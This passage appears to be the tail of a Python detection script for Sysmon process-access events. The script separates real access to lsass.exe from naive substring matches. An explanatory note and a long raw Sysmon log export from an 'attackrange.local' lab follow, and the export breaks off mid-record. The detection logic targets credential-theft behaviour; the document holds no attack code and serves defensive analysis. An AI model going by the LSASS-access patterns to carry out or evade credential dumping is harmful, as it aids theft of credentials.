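
def analyze(raw_records):
    """Parse every record, resolve fused PIDs, and return (findings, naive_hits)."""
    events = [e for e in map(parse_record, raw_records) if e]
    known = {e["pid"] for e in events if "pid" in e} | {e["tgt_pid"] for e in events if "tgt_pid" in e}
    findings, naive = [], []
    for e in events:
        if e["eid"] != 10 or "src_ids" not in e:
            continue
        e["src_pid_tid"] = split_pid_tid(e["src_ids"], known)
        findings.extend((e["rec"], f) for f in check_access(e))
        if "lsass.exe" in e["raw"].lower():   # the substring rule a grep would use
            naive.append(e["rec"])
    return findings, naive


if __name__ == "__main__":
    found, naive = analyze(SAMPLES)
    print("field-aware findings:", found)
    print("records a plain 'lsass.exe' grep would flag:", naive)
```

Two things in this export are worth noticing when it is run. The record in which `lsass.exe` appears on win-dc-982 has LSASS as the *source* (PID 632) opening the System process (PID 4) with 0x1000, PROCESS_QUERY_LIMITED_INFORMATION, from inside kerberos.dll; a substring match flags it, the field-aware check does not. And the fused `8447060` for svchost.exe cannot be split from the digits alone (both 844/7060 and 84/47060 satisfy the multiple-of-4 rule), which is why the splitter keeps every candidate until a PID seen unfused elsewhere in the export settles it; on a delimiter-intact feed the field is simply two values and none of this is needed.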
10341000x80000000000000001095115Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:16.501{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095114Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:16.364{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0EFC8BDE677490642446B0433EE5750,SHA256=0EAF4E562BAE0353E8B73058ACCD87C7B39ED6ACD23061F2348A6986C9FF64B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095113Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:16.128{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD73B3F152AAE23E24B50A4577EB392,SHA256=6C04BB21EB740326C4D65FD60BACA113D21799C9EDD57D12CB9F8A5FBD65DCE8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606095Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:16.078{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606094Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:16.078{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA9EAB9CB046427C2FF4652C8CD3885,SHA256=600A19AC329E1FEF0040FDEEA50E37BC1649390B63BD92B02E56EBFC2DB7C04Efalsefalse - insufficient disk space 11241100x80000000000000001606093Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:16.059{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606092Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:16.059{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03A08DBB8775290273C26059BFF42C47,SHA256=1A5018D494064382AD4291719A90F3D48941AAA4902A013D1C7AF8FF8D076DDAfalsefalse - insufficient disk space 10341000x80000000000000001095121Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:17.535{761B69BB-818A-607D-0B00-00000000BA01}6326300C:\Windows\system32\lsass.exe{761B69BB-8188-607D-0100-00000000BA01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001095120Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:17.502{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095119Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:17.502{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095118Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:17.137{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8121FC46F36E1D6B1BA8720011DD44B0,SHA256=BA1C802515DE4D73529AD32F1041DD58E0C977C1393C507207CA313E3E8B92CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606098Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:14.604{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49729-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 11241100x80000000000000001606097Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:17.080{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606096Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:17.080{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABFEDF34CD8EBC56971B339BA983505C,SHA256=DA30FC53B375CF194ACF57139576D3C5B4DFC230157912A0B857A42124F91AE3falsefalse - insufficient disk space 354300x80000000000000001095135Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.136{761B69BB-8188-607D-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1151-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local445microsoft-ds 354300x80000000000000001095134Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.136{761B69BB-8188-607D-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1151-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local445microsoft-ds 354300x80000000000000001095133Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.133{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1150-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local49669- 354300x80000000000000001095132Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.133{761B69BB-818C-607D-1400-00000000BA01}1028C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1150-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local49669- 354300x80000000000000001095131Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.132{761B69BB-818C-607D-0D00-00000000BA01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1149-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local135epmap 354300x80000000000000001095130Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.132{761B69BB-818C-607D-1400-00000000BA01}1028C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1149-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local135epmap 354300x80000000000000001095129Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.035{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-982.attackrange.local1148-false10.0.1.14win-dc-982.attackrange.local389ldap 354300x80000000000000001095128Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.035{761B69BB-818C-607D-1600-00000000BA01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1148-false10.0.1.14win-dc-982.attackrange.local389ldap 354300x80000000000000001095127Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.029{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1147-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local389ldap 354300x80000000000000001095126Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.029{761B69BB-818C-607D-1600-00000000BA01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1147-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local389ldap 23542300x80000000000000001095125Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:18.554{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EC90D6356FC31D402EEF45941494EDE,SHA256=630057944AFCB3193D6AE7DF84CBCF163BF32733618FED8CC5F04D1F14182777,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095124Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:18.503{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095123Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:18.503{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095122Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:18.142{761B69BB-820D-607D-D800-00000000BA01}1064NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D7FB2C806A237775C188259793167B,SHA256=8A90DA2EEE590650E18C52BB182B42E2D892E8463C2CD40F79DAD1E18E9814BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606101Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:14.689{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49730-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606100Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:18.083{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606099Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:18.083{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62DC3782606FA24BCBC6F97CB07943B9,SHA256=DF8D2E13160A28E91A7CD82604D72E4B8ABD425A4BA8B87BB45A37C0F4681012falsefalse - insufficient disk space 354300x80000000000000001095158Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.783{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1152-false10.0.1.12-8000- 
10341000x80000000000000001095157Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.719{761B69BB-7A7B-6080-995F-00000000BA01}48844916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095156Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.585{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A7B-6080-995F-00000000BA01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095155Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:19.584{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095154Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.584{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095153Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:19.583{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095152Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.583{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095151Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.583{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-7A7B-6080-995F-00000000BA01}4884C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095150Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.583{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A7B-6080-995F-00000000BA01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095149Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.582{761B69BB-7A7B-6080-995F-00000000BA01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095148Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.546{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84F9373943F28798188AD93488077286,SHA256=C0B59DF015A327A12D8ED35AEA82CDE0732E02F414A9C36A3331B16B522D38A5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095147Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:19.504{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095146Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
